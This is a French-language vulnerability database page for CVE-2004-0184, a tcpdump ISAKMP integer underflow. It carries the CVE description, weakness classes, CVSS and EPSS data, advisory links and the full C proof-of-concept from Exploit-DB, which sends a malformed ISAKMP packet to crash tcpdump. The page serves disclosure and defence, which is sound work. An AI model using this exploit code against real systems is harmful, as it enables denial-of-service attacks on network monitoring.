CVE-2004-0184 : Détail

CVE-2004-0184

Overflow
65.92%V4
Network
2004-04-06
02h00 +00:00
2017-10-09
22h57 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Integer underflow in the isakmp_id_print for TCPDUMP 3.8.1 and earlier allows remote attackers to cause a denial of service (crash) via an ISAKMP packet with an Identification payload with a length that becomes less than 8 during byte order conversion, which causes an out-of-bounds read, as demonstrated by the Striker ISAKMP Protocol Test Suite.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-125 Out-of-bounds Read
The product reads data past the end, or before the beginning, of the intended buffer.
CWE-191 Integer Underflow (Wrap or Wraparound)
The product subtracts one value from another, such that the result is less than the minimum allowable integer value, which produces a value that is not equal to the correct result.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 171

Date de publication : 2004-04-04 22h00 +00:00
Auteur : Rapid7
EDB Vérifié : Yes

/* * tcpdump packet sniffer * Integer underflow in ISAKMP Identification payload * denial of service vulnerability * proof of concept code * version 1.0 (Apr 02 2004) * CVE-ID: CAN-2004-0184 * * by Remi Denis-Courmont < exploit at simphalampin dot com > * www simphalempin com dev * Remi Denis-Courmont is not responsible for the misuse of the * source code provided hereafter. * * This vulnerability was found by: * Rapid7, LLC Security Advisory - www rapid7 com * whose original advisory may be fetched from: * www rapid7 com advisories R7-0017 html * * Vulnerable: * - tcpdump 3.8.1 * * Not vulnerable: * - tcpdump 3.8.3 * * NOTES: * The vulnerability cannot be exploited to cause a denial of service * with the Debian's tcpdump packages as it was partly fixed as part of * the fix for earlier known CAN-2003-0108 vulnerability, though the bug * is still present. That may be the case for other vendors which were * not investigated. * * tcpdump must be run with a verbosity level of at least 3: * # tcpdump -vvv * Otherwise, no denial of service will occur. */ #include <string.h> #include <stdio.h> #include <sys/types.h> #include <unistd.h> #include <sys/socket.h> #include <netdb.h> static const char packet[] = /* ISAKMP header */ "\x00\x00\x00\x00\x00\x00\x00\x00" /* Initiator cookie */ "\x00\x00\x00\x00\x00\x00\x00\x00" /* Responder cookie */ "\x05" /* Next payload: Identification */ "\x10" /* Version: 1.0 */ "\x01" /* Exchange type */ "\x00" /* Flags */ "\x00\x00\x00\x00" /* Message ID */ "\x00\x00\x00\x24" /* Length */ /* ISAKMP Identification payload */ "\x00" /* Next payload: none */ "\x00" /* Reserved */ "\x00\x05" /* Payload length (incorrect) */ "\x20" /* ID type (unknown) */ "\x00\x00\x00" /* DOI */ ; static int send_evil_packet (const struct addrinfo *r) { int fd; size_t len; fd = socket (r->ai_family, r->ai_socktype, r->ai_protocol); if (fd == -1) { perror ("Socket error"); return 1; } len = sizeof (packet) - 1; if (sendto (fd, packet, len, 0, r->ai_addr, r->ai_addrlen) != len) { perror ("Packet sending error"); close (fd); return 1; } puts ("Packet sent!"); close (fd); return 0; } static int proof (const char *hostname) { struct addrinfo *res; int check; { struct addrinfo help; memset (&help, 0, sizeof (help)); help.ai_socktype = SOCK_DGRAM; check = getaddrinfo (hostname, "isakmp", &help, &res); } if (check == 0) { struct addrinfo *ptr; for (ptr = res; ptr != NULL; ptr = ptr->ai_next) check |= send_evil_packet (ptr); freeaddrinfo (res); return check; } fprintf (stderr, "%s: %s\n", hostname, gai_strerror (check)); return -1; } static void usage (const char *path) { fprintf (stderr, "Usage: %s <hostname/IP>\n", path); } int main (int argc, char *argv[]) { puts ("tcpdump Integer underflow in ISAKMP Identification payload\n" "proof of concept code\n" "Copyright (C) Remi Denis-Courmont 2004 " "<\x65\x78\x70\x6c\x6f\x69\x74\x40\x73\x69\x6d\x70" "\x68\x61\x6c\x65\x6d\x70\x69\x6e\x2e\x63\x6f\x6d>\n"); if (argc != 2) { usage (argv[0]); return 2; } return proof (argv[1]) ? 1 : 0; } // milw0rm.com [2004-04-05]

Products Mentioned

Configuraton 0

Tcpdump>>Tcpdump >> Version To (including) 3.8.1

Références

http://www.kb.cert.org/vuls/id/492558
Tags : third-party-advisory, x_refsource_CERT-VN
http://www.redhat.com/support/errata/RHSA-2004-219.html
Tags : vendor-advisory, x_refsource_REDHAT
http://securitytracker.com/id?1009593
Tags : vdb-entry, x_refsource_SECTRACK
http://www.debian.org/security/2004/dsa-478
Tags : vendor-advisory, x_refsource_DEBIAN
http://secunia.com/advisories/11258
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.trustix.org/errata/2004/0015
Tags : vendor-advisory, x_refsource_TRUSTIX
https://bugzilla.fedora.us/show_bug.cgi?id=1468
Tags : vendor-advisory, x_refsource_FEDORA
http://www.securityfocus.com/bid/10004
Tags : vdb-entry, x_refsource_BID
http://marc.info/?l=bugtraq&m=108067265931525&w=2
Tags : mailing-list, x_refsource_BUGTRAQ